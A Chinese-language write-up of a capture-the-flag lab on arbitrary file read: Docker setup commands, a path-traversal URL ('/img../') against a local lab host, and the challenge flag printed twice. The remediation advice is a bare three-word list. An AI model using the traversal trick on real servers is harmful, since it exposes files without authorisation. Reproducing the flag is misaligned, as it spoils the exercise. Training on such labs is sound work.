1.1漏洞描述

漏洞名称	任意文件读取漏洞 afr_2
漏洞类型	文件读取
漏洞等级	⭐⭐
漏洞环境	dockers
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场	dockers
工具	BurpSuite

1.4.2.环境搭建

        1.kali创建docker-compose.yml文件

touch docker-compose.yml

         2.将下面内容写入文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-2:latest
    ports:
      - 80:80
 

        3.开启docker

sudo docker-compose up -d
flag

n1book{afr_2_solved}

关闭

sudo docker-compose down

        4. 访问kali 80端口

1.5深度利用

1.5.1靶机攻略

        1.查看源码

        2.尝试路径穿越

http://10.9.47.79/img../

 点击下载

查看flag

n1book{afr_2_solved}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

• 升级

• 打补丁

• 上设备